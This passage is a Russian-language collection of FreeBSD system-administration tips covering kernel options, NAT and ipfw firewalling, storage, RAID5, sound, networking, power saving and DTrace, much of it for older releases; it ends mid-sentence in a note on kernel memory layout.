Что бы поднять NAT и Firewall на FreeBSD надо: Скомпилировать ядро: Следующие строки нужно включить в /usr/src/sys/i386/conf/GENERIC файл конфигурации: options IPFIREWALL options IPDIVERT options IPFIREWALL_VERBOSE options IPFIREWALL_VERBOSE_LIMIT=10 options DUMMYNET options TCP_DROP_SYNFIN Переходим в директорию /usr/src/ make buildkernel KERNCONF=GENERIC make installkernel KERNCONF=GENERIC Следующие строки можно к примеру включить в rc.conf файл конфигурации: hostname="free" ifconfig_rl0="10.0.0.1" gateway_enable="YES" firewall_enable="YES" firewall_type="open" natd_enable="YES" natd_interface="rl0" natd_flags="-redirect_port tcp 10.0.0.10:80 80" tcp_extensions="NO" tcp_drop_synfin="YES" icmp_drop_redirect="YES" sendmail_enable="NONE" Для удаленного управления нужно добавить следующую строку: sshd_enable="YES" (возможно понадобится скопировать /etc/ssh/ssh_host_dsa_key.pub в /root/.ssh/authorized_keys Следующие строки можно включить в rc.firewall файл конфигурации (секция "open"): [Oo][Pp][Ee][Nn]) oif="rl0" iif="tx0" oip="132.5.7.172" iip="10.0.0.1" lan="10.0.0.0/24" setup_loopback # allow all for LAN ${fwcmd} add 500 pass all from ${lan} to ${iip} via ${iif} ${fwcmd} add 550 pass all from ${iip} to ${lan} via ${iif} # download - 60K upload - 6K for all lan ip's ${fwcmd} add 600 pipe 1 ip from any to any in via ${oif} ${fwcmd} add 650 pipe 2 ip from any to any out via ${oif} # for selected ip's only # ${fwcmd} add 601 pipe 1 all from any to 10.0.0.10 # ${fwcmd} add 651 pipe 2 all from 10.0.0.10 to any ${fwcmd} pipe 1 config bw 512Kbit/s ${fwcmd} pipe 2 config bw 48Kbit/s # dns setup ${fwcmd} add 770 pass tcp from any to ${oip} 53 setup ${fwcmd} add 780 pass udp from any domain to any ${fwcmd} add 790 pass udp from any to any domain # main setup ${fwcmd} add 800 pass tcp from any http,https,20-21,989-990 to any ${fwcmd} add 810 pass tcp from any to any http,https,20-21,989-990 ${fwcmd} add 830 pass tcp from any pop3,pop3s,smtp,imap,imaps,aol to any ${fwcmd} add 840 pass tcp from any to any pop3,pop3s,smtp,imap,imaps,aol ${fwcmd} add 65000 deny ip from any to any ;; Где oip, oif - внешний интерфейс; iip, iif - внутренний; lan - внутренняя сеть. Такая конфигурация ipfw весьма параноидальна, и здесь приведена только в качестве примера. На практике обычно нужен более открытый фаервол.

Работа с DVD-RAM во FreeBSD как с жестким диском (доп. ссылка 1) Автор: proff [комментарии]

Решение такое: 1. сборка и инсталляция ядра с устройствами: device scbus device atapicam device cd device pass 2. создание файлов устройств cd0, cd1 с помощью /dev/MAKEDEV 3. disklabel -rw cd1c auto 4. newfs cd1c 4.1. Можно включить softupdates: tunefs -n enable cd1 5. mount /dev/cd1c /mnt/dvdram Все. Скорость записи ~ 1.2 Mb/s.

Решение проблем подергиванием звука в FreeBSD Автор: Roman Y. Bogdanov [комментарии]

Решение проблем с "лаганием", "залипанием", "подергиванием" звука для FreeBSD 5.x при сильных нагрузках на ata систему: в /boot/loader.conf добавить строку hint.pcm.0.buffersize="16384". Работает не со всеми звуковыми картами. Карточка с MediaForte чипом стала играть звук в 4 раза быстрее, на SoundBlaster 5.1 live все играет замечательно.

Создание снапшота UFS2 в FreeBSD 5 (доп. ссылка 1) [комментарии]

mount -u -o snapshot ./snapshot_image /var mdconfig -a -t vnode -f ./snapshot_image -u 1 mount -o ro /dev/md1 /mnt/snap ... umount /mnt/snap mdconfig -d -u 1 Также можно использовать специализированную утилиту snapshot, представляющую собой фронтенд к mount и mdconfig.

Настройка эмуляции Linux во FreeBSD (доп. ссылка 1) Автор: sTALker150379 [обсудить]

Добавляем в /boot/loader.conf: linux_load="YES" linprocfs_load="YES" В /etc/fstab: linprocfs /compat/linux/proc linprocfs rw 0 0 /etc/rc.conf linux_enable="YES" /etc/sysctl.conf kern.fallback_elf_brand=3

Создание пользователя для отключения компьютера в FreeBSD. Автор: Stas_Dragon [комментарии]

Создание специальной учетной записи пользователя для отключения компьютера. Задача: Создать учетную запись пользователя, которому разрешено только отключать компьютер. ОС FreeBSD 5.2 создать в папке /bin скрипт poweroff-shell со следующим содержанием: #!/bin/sh shutdown -p +2 Turn off by user $LOGNAME logger Turn off by user $LOGNAME exit 0 установить разрешения: chmod 750 /bin/poweroff-shell сменить группу и владельца: chown root /bin/poweroff-shell chgrp operator /bin/poweroff-shell добавить в файл /etc/shells строчку: /bin/poweroff-shell создать пользователя poweroff: c шелом /bin/poweroff-shell, домашней директорией /nonexistent, сделать пользователя poweroff членом группы operator, с паролем по вкусу.

Использование нескольких источников звука в FreeBSD (доп. ссылка 1) Автор: lavr [комментарии]

Для одновременного воспроизведения звука от разных приложений нужно создать несколько виртуальных звуковых каналов: sysctl hw.snd.pcm0.vchans=4 sysctl hw.snd.maxautovchans=4 Если devfs не используется, в приложении нужно обращаться к устройствам /dev/dsp0.N , где N - номер свободного канала. Для установки громкости звука по умолчанию в FreeBSD 5.3 в /boot/device.hints добавляем: hint.pcm.0.vol="100"

Объединение сетевых интерфейсов под FreeBSD 5.x (доп. ссылка 1) Автор: Мишка [комментарии]

Превращение двух 100 мбит/c сетевых карт в одну виртуальную, с пропускной способностью 200 мбит/c . kldload /boot/kernel/ng_ether.ko kldload /boot/kernel/ng_one2many.ko ifconfig rl0 up ifconfig rl1 up ngctl mkpeer rl0: one2many upper one ngctl connect rl0: rl0:upper lower many0 ngctl connect rl1: rl0:upper lower many1 ngctl msg rl1: setpromisc 1 ngctl msg rl1: setautosrc 0 ngctl msg rl0:upper \ setconfig "{ xmitAlg=1 failAlg=1 enabledLinks=[ 1 1 ] }" ifconfig rl0 inet 192.168.0.78

Создание файла подкачки (swapfile) в FreeBSD (доп. ссылка 1) [комментарии]

Для FreeBSD 4.x В /boot/loader.conf добавляем vn_load="YES" cd /dev; sh MAKEDEV vn0 dd if=/dev/zero of=/usr/swap0 bs=1024k count=64 chmod 0600 /usr/swap0 В /etc/rc.conf добавляем swapfile="/usr/swap0" Для активации без перезагрузки: vnconfig -e /dev/vn0b /usr/swap0 swap Для FreeBSD 5.x dd if=/dev/zero of=/usr/swap0 bs=1024k count=64 chmod 0600 /usr/swap0 В /etc/rc.conf добавляем swapfile="/usr/swap0" Для активации без перезагрузки: mdconfig -a -t vnode -f /usr/swap0 -u 0 && swapon /dev/md0

Включение поддержки IPv6 в FreeBSD (доп. ссылка 1) [комментарии]

Ядро: options INET6 # IPv6 communications protocols pseudo-device gif # IPv6 and IPv4 tunneling pseudo-device faith 1 # IPv6-to-IPv4 relaying (translation) Регистрация и получение IP (http://www.freenet6.net или http://www.tunnelbroker.net) cd /usr/ports/net/freenet6/ # make install clean # /usr/local/etc/rc.d/freenet6.sh start Подъем IPv6 вручную ifconfig gif0 create ifconfig gif0 tunnel your-local-ipv4 remote-ipv4-of-your-broker ifconfig gif0 inet6 ipv6-given-by-the-broker ipv6-of-your-broker prefixlen 128 route -n add -inet6 default ipv6-of-your-broker /etc/rc.conf: ipv6_enable="YES" ipv6_defaultrouter="brokeripv6" ipv6_gateway_enable="YES" ipv6_network_interfaces="de0 gif0" ipv6_ifconfig_gif0="brokeripv6 prefixlen 128" ipv6_ifconfig_de0="youripv6::1 prefixlen 64" ipv6_static_routes="global" ipv6_route_global="2000:: -prefixlen 3 youripv6" gif_interfaces="gif0" gifconfig_gif0="youripv4 brokeripv4" Фаервол (Ipfilter): /etc/ipf6.rules pass in all pass out all ipf -6 -f /etc/ipf6.rules

Звук в FreeBSD 4.9 на nForce2 Ultra 400 Автор: axbat [комментарии]

Для работы со встроенным кодеком не надо загружать драйверов с сайта Avance Logic, достаточно: - в boot/loader.conf в разделе Sound modules включить загрузку snd_ich_load="YES" # Intel ICH после этого убедиться, что все определилось: dmesg | grep pcm0

Как включить поддержку ACL в UFS2 FreeBSD 5 (доп. ссылка 1) [комментарии]

В single mode: "/sbin/tunefs -a enable /fs" Пересобираем ядро с "options UFS_ACL" getfacl - просмотр ACL setfacl - установка ACL Например: setfacl -m user:nobody:rw-,group:wheel:rw- acl-test

Как в FreeBSD добавить/убрать алиас для сетевого интерфейса [комментарии]

Добавить: ifconfig fxp0 inet 192.168.1.1 netmask 255.255.255.255 alias Убрать: ifconfig fxp0 inet 192.168.1.1 netmask 255.255.255.255 -alias

Как подключить USB Flash накопитель в FreeBSD (доп. ссылка 1) [комментарии]

man umass Конфигурация ядра (FreeBSD 4.8 можно не пересобирать): device usb device ohci (OR device uhci) device umass device scbus device da device pass В логе смотрим подобное сообщение "da0 at umass-sim0 bus 0 target 0 lun 0" Монтируем: mount -t msdos /dev/da0s1 /mnt

Установка дисковых квот в FreeBSD (доп. ссылка 1) Автор: Igor [обсудить]

- в конфигурации ядра включаем "options QUOTA" и пересобираем ядро. - в /etc/rc.conf прописываем enable_quotas="YES" и check_quotas="YES" - указываем в fstab файловые системы, для которых будет включаться поддержка квот, например: /dev/da0s1e /home ufs rw,userquota 2 2 /dev/ad0s1h /new_home ufs rw,groupquota 2 2 - устанавливаем квоты для пользователей при помощи edquota, напр. "edquota user1" - если нужно установить одинаковые квоты для нескольких пользователей как у user1: edquota -p user1 user2 user3 user4 user5

Использование в FreeBSD IEEE 802.1Q VLAN'ов совместно с Cisco Catalyst Switch [комментарии]

В конфигурации FreeBSD ядра: pseudo-device vlan 20 # VLAN support (для динамической генерации в новых версиях - 20 можно не писать) Поднимаем VLAN вручную (где 28 - vlan id на свиче, fxp0 - интерфейс воткнутый в свитч): ifconfig vlan0 inet 192.168.1.3 netmask 255.255.255.0 vlan 28 vlandev fxp0 Прописываем в /etc/rc.conf: cloned_interfaces="vlan0" ifconfig_vlan0="inet 192.168.1.3 netmask 255.255.255.0 vlan 28 vlandev fxp0" На коммутаторе Cisco Catalyst: interface FastEthernet0/1 # линк к FreeBSD switchport mode trunk interface FastEthernet0/2 switchport access vlan 28

Как примонтировать iso-образ CD диска в FreeBSD [комментарии]

В /boot/loader.conf добавляем vn_load="YES" или подгружаем руками kldload vn.ko Монтируем: vnconfig /dev/vn0c /home/user/cdrom.iso mount -t cd9660 /dev/vn0c /mnt Размонтируем: umount /mnt vnconfig -u /dev/vn0c

Как разрешить в FreeBSD монтировать CD-ROM обычным пользователям (доп. ссылка 1) [комментарии]

/etc/sysctl.conf: vfs.usermount=1 vfs.generic.usermount=1 mount -t cd9660 /dev/acd0c /home/user/cdrom chmod 644 /dev/acd0c

Как примонтировать в FreeBSD CD-ROM с русифицированной FS, чтобы русские буквы не выглядели как вопросительные знаки. Автор: lavr [комментарии]

cd /usr/ports/sysutils/cd9660_unicode make && make install грузить модуль через kldload /lib/cd9660_unicode/cd9660_[unicode|koi8-r|iso-8859-5|cp866].ko

Как включить поддержку SMBFS в FreeBSD и примонтировать удаленный windows ресурс. [комментарии]

пересобираем ядро: options NETSMB #SMB/CIFS requester options NETSMBCRYPTO #encrypted password support for SMB options LIBMCHAIN #mbuf management library options LIBICONV options SMBFS Коннектимся к удаленному SMB серверу: smbutil login //jwarner@smbserver1 Монтируем русурс: mount_smbfs -N //jwarner@smbserver1/sharename /backup Отсоединяемся от SMB сервера: smbutil logout //jwarner@smbserver1

Как завести нового пользователя в FreeBSD в автономном режиме ? (доп. ссылка 1) [обсудить]

Нужно использовать не команду adduser, а команду pw (man pw, pw useradd help). Например: pw useradd -n логин -c 'комментарий, фио' -d /home/логин -m -s /bin/true

Что иногда следует избыточно создать в '/dev' для FreeBSD (доп. ссылка 1) Автор: lavr [обсудить]

MAKEDEV - ad0 ad1 ad2 ad3 ... - default=0,...,3 остальное+slices руками MAKEDEV ptyN - псевдо-терминалы, default==32 MAKEDEV vtyN - виртуальные терминалы через syscons, defaul==12 MAKEDEV iic - создание устройств для I2C MAKEDEV smb - создание устройств для SMBus шины MAKEDEV snd - создание устройств для SoundBlaster

Как в FreeBSD при загрузке в single read-olny переключится в RW режим. [обсудить]

mount -u -w /

Какие программы в FreeBSD занимаются переиндексацией системных баз [комментарии]

/bin/sh MAKEDEV all (dev_mkdb) /usr/bin/newaliases /usr/bin/cap_mkdb /etc/login.conf /usr/sbin/pwd_mkdb -p /etc/master.passwd

Как на сервере обеспечить подключение PS/2 клавиатуры, без перезагрузки [комментарии]

Для того чтобы на загруженный без PS/2 клавиатуры сервер, можно было в любой момент подключить клавиатуру без перезагрузки, нужно в конфигурации ядра заменить строку: device atkbd0 at atkbdc? irq 1 flags 0x1 на device atkbd0 at atkbdc? irq 1 Т.е. убрать 'flags 0x1' и тем самым разрешить загружать драйвер клавиатуры при отключенной в момент загрузки клавиатуре.

Как в FreeBSD более подробно ознакомится с поддержкой аппаратного устройства [обсудить]

man 4 имя_устройства. примеры: man 4 fxp; man 4 rl; man 4 ed; man 4 amr; man 4 pcm; man 4 cd; man 4 tty; man 4 sio;

Как переключить сетевую карту в FreeBSD из full-duplex в half-duplex [комментарии]

Текущий режим работы сетевой карты можно посмотреть выполнив: # ifconfig fxp0 Перевести сетевую карту в режим работы 10baseT/UTP half-duplex: # ifconfig fxp0 media 10baseT/UTP mediaopt half-duplex Автоматически выбрать режим: # ifconfig fxp0 media autoselect Подробнее: man 4 ed, man 4 rl, man 4 fxp

Настройка программного RAID5 во FreeBSD Автор: McSeem [комментарии]

Понадобилось организовать надежное хранение большого объёма данных. По сей день использовалось софтовое зеркало, но существующего объёма уже не хватало и решено было соорудить RAID5 из трёх дисков по терабайту. В моём случае избыточность составит 1/3 против 1/2 (зеркало). Судя по тому, что мне удалось узнать FreeBSD поддерживает организацию RAID5 двумя менеджерами дискового пространства: VINUM и GEOM. Попробуем каждый из них: I. VINUM. Начиная с FreeBSD5 VINUM была переписана для совместимости с архитектурой GEOM, и теперь новая подсистема называется GVINUM, а модуль ядра сменил название с vinum.ko на geom_vinum.ko. Создадим директорию к которой будем монтировать наш RAID5: snap# mkdir /raid5 Теперь создаём конфигурационный файл нашего массива(расположить его можно где угодно): snap# touch /usr/local/gvinum.conf После этого непосредственно конфигурируем наш массив(как я говорил, в моем случае будет 3 диска по терабайту): snap# vi /usr/local/gvinum.conf Пишем в файле следующее: drive raid51 device /dev/ad5 drive raid52 device /dev/ad6 drive raid53 device /dev/ad7 volume raid5 plex org raid5 256k sd len 1t drive raid51 sd len 1t drive raid52 sd len 1t drive raid53 Где: - drive raid51/raid52/raid53 - это просто псевдонимы физических дисков (можно придумать любое). Используются чисто для удобства. С этими псевдонимами мы будем работать во всём файле и поменяв физический диск, нам не придётся менять его название во всём конфигурационном файле, а достаточно лишь изменить в описании. - volume raid5 - это виртуальный диск (можно придумать тоже любое название). Система его будет видеть как 1 физическое устройство, хотя в моем случае это массив из 3х дисков с полезным объёмом равным ~2м терабайтам. Отображаться будет как /dev/gvinum/raid5 (Назовёте volume terminator, отображаться будет /dev/gvinum/terminator). - plex - это набор, который предоставляет полное адресное пространство тома. Нам нобходим набор RAID5, поэтому организуем набор RAID5: org raid5, причем организовываем со страйпом в 256кВ (судя документации это самый оптимальный размер полосы). - sd - это поддиски(SubDisk), VINUM может организовывать массивы не только из отдельных физических дисков, но и используя разделы UNIX. Я же использую 3 отдельных физических устройства, каждый по 1 терабайту, поэтому указываем размер: len 1t. На этом описание конфигурационного файла закончилось. Теперь создаём сам RAID массив: snap# gvinum create /usr/local/gvinum.conf Создаётся устройство /dev/gvinum/raid5. На нём необходимо создать файловую систему. Создаём: snap# newfs /dev/gvinum/raid5 Стандартное ядро FreeBSD(GENERIC) не включает Vinum. Можно пересобрать ядро с поддержкой Vinum, но этого делать не рекомендуют. Обычный способ активации Vinum - загрузка модуля для ядра (kld). Так и поступим, только использовать команду kldload не будем, да и нет необходимости, при первом вызове gvinum проверит наличие поддержки Vinum в ядре и при необходимости загрузит модуль автоматически. Я сделаю так чтобы модуль Vinum был доступен на этапе загрузки, для этого делаем так: snap# echo geom_vinum_load="YES" >> /boot/loader.conf И последний момент, нужно смонтировать наш массив (Точку монтирования мы указываем /raid5, ту, что создали изначально): snap# echo /dev/gvinum/raid5 /raid5 ufs rw 2 2 >> /etc/fstab Перегружаемся и всё должно работать. :( У меня сервер уходит в Fatal trap 12(Kernel panic) и перегружается до бесконечности. Ничего страшного. Выключаем, ждём 5 минут и включаем, если не получится, выключаем, ждём ещё 5 минут и включаем, в конце концов включается всё норм! Называется размечтался... 1t = 1024G, смотрю свой диск... а там всего 953869m... В общем нужно в конфиге уменьшить размер - len! И после этого всё замечательно работает!!! Можно выводить диски из массива и т.д., но как-то долго... проще сбросить конфиг: snap# gvinum resetconfig На что, он нас спрашивает, вы мол в своё уме? подтвердите что вы это делаете осмысленно! И просит ввести текст "NO FUTURE", ну чтож, вводим: Enter text -> NO FUTURE Я поменял в конфиге размеры дисков на: len 953869m После этого, повторяем команды: snap# gvinum create /usr/local/gvinum.conf snap# newfs /dev/gvinum/raid5 Перегружаемся ещё раз...И вуаля!!! Всё работает!!! II. GEOM: Пробуем второй вариант. GEOM RAID5 в FreeBSD не входит, поэтому придётся скачивать с сайта. На сайте видим, что есть 3 версии это: - Компромисс скорости и использования памяти: geom_raid5 - Самая стабильная, но и самая медленная: geom_raid5 TNG - Улучшенная скорость, но и памяти соответственно потребляет больше: geom_raid5 PP Все версии доступны тут: geom_raid5: http://wgboome.homepage.t-online.de./geom_raid5.tbz geom_raid5 TNG: http://wgboome.homepage.t-online.de./geom_raid5-eff.tbz geom_raid5 PP: http://wgboome.homepage.t-online.de./geom_raid5-pp.tbz Я выбрал "geom_raid5", поэтому переходим в папку с источниками: snap# cd /usr/src И скачиваем архив: snap# wget http://wgboome.homepage.t-online.de./geom_raid5.tbz Архив необходимо распаковать. Действуем: snap# tar -xf geom_raid5.tbz Архив распакован,переходим к процессу инсталляции. Первым делом необходимо собрать модуль. Переходим в папку с конфигом: snap# cd /usr/src/sys/modules/geom/geom_raid5 И запускаем компиляцию: snap# make упс... :( у меня вылезли ошибки...читаем...пробуем исправить... Для этого делаем следующее: snap# cd /usr/src/sys/geom/raid5 И правим в файле g_raid5.c (если у вас ошибки будут такие же как и у меня) кому каким редактором удобнее: 1. Ошибка: в строке 2015 в функции "kthread_exit" много аргументов исправляем: меняем в строке 2015 kthread_exit(0); на kthread_exit(); 2. Ошибка: в строке 2444 в функции "kthread_exit" много аргументов исправляем: меняем в строке 2444 kthread_exit(0); на kthread_exit(); 3. Ошибка: в строке 2635 нету описания функции "kthread_create" исправляем: меняем в строке 2635 kthread_create (остальное не трогаем), на kproc_create 4. Ошибка: в строке 2639 нету описания функции "kthread_create" исправляем: меняем в строке 2639 kthread_create (остальное не трогаем), на kproc_create Примечание: Ошибка 4 другая, и ссылается на строку 2635, но изменив строку 2635 необходимо изменить и 2639, так что делаем так. После того как исправили,снова делаем компиляцию модуля: snap# cd /usr/src/sys/modules/geom/geom_raid5 snap# make Появляется нужный нам файл: "*geom_raid5.ko". Его необходимо скопировать ко всем модулям. Копируем: snap# cp geom_raid5.ko /boot/kernel/geom_raid5.ko Теперь устанавливаем сам geom_raid5: snap# cd /usr/src/sbin/geom/class/raid5 snap# make && make install && make clean Собственно после инсталляции GEOM_RAID5 собираем RAID массив: snap# graid5 label -v -s 256k graid5 /dev/da0 /dev/da1 /dev/da2 И создаём устройство: snap# graid5 load Создаётся устройство /dev/raid5/graid5. На нём необходимо создать файловую систему. Создаём: snap# newfs /dev/raid5/graid5 Создаём точку монтирования: snap# mkdir /graid5 Добавляем запись в /etc/fstab, для автоматического монтирования нашего массива RAID5 при загрузке системы: snap# echo /dev/raid5/graid5 /graid5 ufs rw 2 2 >> /etc/fstab Не забываем добавить загрузку модуля при старте системы: snap# echo 'geom_raid5_load="YES" >> /boot/loader.conf P.S. В конечном итоге остановил свой выбор на GVINUM. В основном из-за того, что он входит в состав FreeBSD, а разработчики, раз решили что GEOM_RAID5 ещё рано(или уже поздно) входить в релиз, то значит так и есть. Протестировал GVINUM на крах (отключением питания и отсоединением шлейфа от одного из дисков в режимах чтение\запись, после этого записывал\удалял данные с битого массива, перегружался, добавлял снова диск, восстанавливал всё работает замечательно! ...но это уже тема для другой статьи...)

Как правильно прописать сменные накопители в /etc/fstab для FreeBSD. Автор: Insane [комментарии]

/dev/acd0c /mnt/cdrom cd9660 ro,noauto,-W=koi2dos, -L=ru_RU.KOI8-R 0 0 /dev/fd0 /mnt/flop msdos rw,noauto,-W=koi2dos, -L=ru_RU.KOI8-R 0 0 /dev/ad0s2 /mnt/store msdos rw,-W=koi2dos, -L=ru_RU.KOI8-R,noexec,nosuid,nosymfollow, -u0,-g0,-m 660 0 0 Еще для удобства можно создать симлинки типа: ln -sf /dev/acd0c /dev/cdrom ln -sf /dev/acd1c /dev/cdrom1 (если есть второй cdrom) ln -sf /dev/fd0 /dev/flop прописать изменения в fstab, и монтировать диски командой mount /dev/cdrom а не mount /dev/acd0c =).

Сис. информация, оптимизация и тюнинг FreeBSD

Оптимизация использования SSD-накопителя во FreeBSD 9.0 Автор: ixes [комментарии]

Ниже собраны рекомендации по оптимизации работы SSD-накопителя во FreeBSD 9.0, которые удалось найти в Сети. Процесс установки и оптимизации под 4k блоки со сдвигом кратный 8, описывать не буду так как FreeBSD 9.0 cам все это делает (если установка выполнялась в автоматическом режиме). После установки необходимо включить поддержку TRIM, для этого следует выполнить (диск должен быть отмонтирован - загрузись с LiveCD): tunefs -t enable /dev/adaxxx Отключение журналирования (может быть чревато более длительным временем проверки целостности ФС, если некорректно завершить работу, нажать reset, или если свет отключат - пользуйтесь бесперебойником): tunefs -J disable /dev/adaxxx tunefs -n disable /dev/adaxxx tunefs -j disable /dev/adaxxx Посмотреть состояние флагов раздела можно командой: tunefs -p /dev/adaxxx Отключение лишних обновлений метаданных (noatime) и использование tmpfs для временных разделов и логов в /etc/fstab: /dev/adaxxx / ufs rw,noatime 1 1 tmpfs /tmp tmpfs rw 0 0 tmpfs /var/run tmpfs rw 0 0 tmpfs /var/spool tmpfs rw 0 0 tmpfs /var/log tmpfs rw 0 0 Перед добавлением убедитесь, что /var/spool, /var/log и /var/run не содержит того, что может потребоваться между перезагрузками. Вариант настройки через /etc/rc.conf: tmpmfs="YES" tmpsize="20m" tmpmfs_flags="-S" varmfs="YES" varsize="32m" varmfs_flags="-S" populate_var="YES" Размер виртуальной файловой системы (tmpfs) писать в соответствии с свободным ОЗУ (в нашем примере, 20 мегабайт для /tmp и 32 мегабайт для /var). Настройки нужно сделать или в /etc/fstab или в /etc/rc.conf.

Активация поддержки DTrace во FreeBSD (доп. ссылка 1) (доп. ссылка 2) [обсудить]

Краткое руководство по включению системы динамической трассировки DTrace во FreeBSD: 1. Включаем в ядре настройки KDTRACE_HOOKS, DDB_CTF и KDTRACE_FRAME (для amd64): options KDTRACE_HOOKS # включение DTrace-хуков (для всех архитектур) options DDB_CTF # включении поддержки загрузки CTF-данных в ELF-компоновщике (для всех архитектур) options KDTRACE_FRAME # (для архитектуры amd64) makeoptions WITH_CTF=1 2. Пересобираем ядро (параметр WITH_CTF=1 должен быть прописан в файл конфигурации ядра, указание в make.conf или src.conf не поддерживается. make buildkernel KERNCONF=DTRACE 3. Устанавливаем новое ядро и перезагружаемся: make installkernel KERNCONF=DTRACE shutdown -r NOW 4. Загружаем модули ядра, необходимые для работы DTrace: kldload dtraceall 5. Убеждаемся, что нужные DTrace-хуки доступны (запускать команды для работы с DTrace нужно от пользователя root): dtrace -l | head 6. Правим make.conf для поддержки Dtrace на уровне пользователя: STRIP= CFLAGS+=-fno-omit-frame-pointer 7. Пересобираем пользовательское окружение, выполнив make buildworld и make install world Хорошие подборки DTrace-скриптов можно найти на страницах: * http://hub.opensolaris.org/bin/view/Community+Group+dtrace/dtracetoolkit * http://www.solarisinternals.com/si/dtrace/ * http://www.brendangregg.com/dtrace.html Запускаем скрипты так: dtrace -s скрипт.d

Советы по уменьшению энергопотребления ноутбука с FreeBSD (доп. ссылка 1) [комментарии]

1. CPU Включение демона powerd позволяет менять частоту/вольтаж CPU в зависимости от нагрузки. Отключаем "p4tcc" и "throttling" в пользу более эффективного EIST. В /boot/loader.conf: hint.p4tcc.0.disabled=1 hint.acpi_throttle.0.disabled=1 Изменяем метод поведения CPU в моменты неактивности с C1 (по умолчанию) на C2, который поддерживает отключение всех основных таймеров CPU. В /etc/rc.conf добавляем: performance_cx_lowest="C2" economy_cx_lowest="C2" Уменьшаем частоту генерации прерываний таймера, в loader.conf: kern.hz=100 Экономия 5 Вт. 2. PCI Для отключения питания не используемых PCI устройств (например, FireWire и USB контроллер) достаточно пересобрать ядро без драйверов ненужных устройств и указать в loader.conf: hw.pci.do_power_nodriver=3 Когда в устройстве возникнет необходимость, достаточно подгрузить драйвер как модуль ядра. Экономия 3 Вт. 3. WiFi и Bluetooth Аппаратное отключение WiFi и Bluetooth через обычно предусмотренную на ноутбуке комбинацию клавиш экономит около 2 Вт. 4. HDA модем Физическое удаление платы HDA-модема привело к экономии 1 Вт. 5. HDA звук Для уменьшения числа прерываний для звуковой карты в loader.conf прописываем: hint.pcm.0.buffersize=65536 hint.pcm.1.buffersize=65536 hw.snd.feeder_buffersize=65536 hw.snd.latency=7 6. Жесткий диск Для хранения временных файлов, чтобы не дергать лишний раз НЖМД, можно использовать tmpfs. Отключаем лишние периодически просыпающиеся сервисы, отключаем syslogd, используем легковесный оконный менеджер (например, icewm); Включение энергосберегающего spin-down режима работы 2.5" Hitachi SATA HDD привело к экономии 1 Вт, полное отключение - 2 Вт. Итог: Вышеописанные рекомендации + несколько дополнений внесенных в ветку FreebSD 8.0 (подробнее см. ссылку внизу на оригинальное сообщение) позволили добиться следующий результатов: acpiconf -i0 было: 2:24 часа (1621 mA) стало: 4:47 часа (826 mA) Для сравнения, оптимальные настройки Windows XP позволили продлить работу до 3:20 часов.

Решение проблемы с Nvidia драйверами во FreeBSD (доп. ссылка 1) Автор: Nirnroot [комментарии]

Проблема: после установки проприентарных драйверов Nvidia на FreeBSD X.Org зависает по непонятным причинам, либо кидает систему в перезагрузку. Когда возникает: экспериментальным путем было выведено, что если совокупная доступная оперативная память системы + память видеокарты больше ~3.300 Мб (конкретно - предел оперативной памяти, определяемый стандартным ядром FreeBSD x86). Решение: добавить в /boot/loader.conf строчку: machdep.disable_mtrrs=1

Решение проблемы слишком частой парковки головок на ноутбуке под FreeBSD (доп. ссылка 1) Автор: Михаил Иванов [комментарии]

На некоторых ноутбуках (или с некоторыми винчестерами) операционная система использует слишком агрессивный режим экономии электроэнергии. В этом режиме происходит очень частая парковка головок винчестера, буквально каждые несколько секунд. Винчестеры имеют ограничение на количество парковок и слишком частая парковка может преждевременно исчерпать этот ресурс. Для диагностирования проблемы понадобится утилита smartctl (sysutils/smartmontools в портах). Выполните команду: smartctl -A /dev/ad4 | grep Load_Cycle (измените ad4 на название вашего винчестера) Результатом выполнения будет примерно следующее: 193 Load_Cycle_Count 0x0012 097 097 000 Old_age Always - 37606 Последнее число в этой строке - это количество парковок. Выполните эту команду несколько раз с перерывом в несколько секунд. Если число растет - значит, проблема на лицо. Во FreeBSD эта проблема решается с помощью утилиты ataidle (sysutils/ataidle в портах). Выполните команду: ataidle -P 254 /dev/ad4 (измените ad4 на название вашего винчестера) Параметр -P управляет питанием винчестера. Значение 254 означает режим максимальной производительности. В этом режиме энергия не экономится и головки не паркуются. Желающие могут посмотреть значения других режимов в man ataidle. Чтобы эта команда выполнялась автоматически при загрузке, нужно добавить следующие строки в файл /etc/rc.conf: ataidle_enable="YES" ataidle_devices="ad4" ataidle_ad4="-P 254"

Увеличение скорости пересборки FreeBSD при помощи CCACHE (доп. ссылка 1) [комментарии]

Ccache позволяет увеличить скорость повторной сборки программы за счет кэширования промежуточных данных. Во FreeBSD ccache можно установить из портов: cd /usr/ports/devel/ccache && make install clean Далее включаем ccache при сборке системы, в /etc/make.conf добавляем: .if !defined(NO_CACHE) CC= /usr/local/libexec/ccache/world-cc CCX= /usr/local/libexec/ccache/world-c++ .endif .if ${.CURDIR:M*/ports/devel/ccache} NO_CCACHE= yes .endif Конфигурируем ccache через переменные окружения, в .cshrc добавляем: setenv PATH /usr/local/libexec/ccache:$PATH setenv CCACHE_PATH /usr/bin:/usr/local/bin setenv CCACHE_DIR /var/tmp/ccache setenv CCACHE_LOGFILE /var/log/ccache.log if ( -x /usr/local/bin/ccache ) then /usr/local/bin/ccache -M 512m > /dev/null endif Через опцию "-M" мы определили максимальный размер кэша (по умолчанию 1Гб), кэш будет размещен в /var/tmp/ccache (по умолчанию в /root/.ccache) Состояние кэша можно посмотреть командой: ccache -s При повторном выполнении make buildworld, время сборки с ccache уменьшилось в 4 раза. Для еще большего увеличения скорости кэш рекомендуется расширить до 4 Гб. Для индивидуальной отмены кэширования при сборке порта можно использовать: make NO_CACHE=yes install clean

Параметры распределение памяти для ядра FreeBSD (доп. ссылка 1) Автор: Yar Tikhiy [обсудить]

Такой вопрос обычно возникает вслед за желанием оптимизировать распределение памяти в ядре. Для начала стоит понять, как в общем выглядит виртуальное адресное пространство FreeBSD. В его нижней части расположен текущий процесс, а верхнюю всегда занимает ядро. Отрезок виртуального адресного пространства, занятый ядром, -- kernel virtual memory (KVM) он же kernel virtual address space (KVA) -- ограничен адресами KERNBASE снизу и VM_MAX_KERNEL_ADDRESS сверху. Эти величины меняются только от платформы к платформе, а vm.kvm_size возвращает их разность: vm.kvm_size = VM_MAX_KERNEL_ADDRESS - KERNBASE На живой машине ядро фиксирует конец используемой части KVM в переменной ядра kernel_vm_end. Отрезок от kernel_vm_end до VM_MAX_KERNEL_ADDRESS и есть свободная часть KVM: vm.kvm_free = VM_MAX_KERNEL_ADDRESS - kernel_vm_end Очевидно, что переменные vm.kvm_size и vm.kvm_free чисто информационные, настраивать их нельзя. В KVM есть участок, который ядро использует для динамического распределения памяти посредством malloc(9) и zone(9). Длина этого участка вычисляется при загрузке 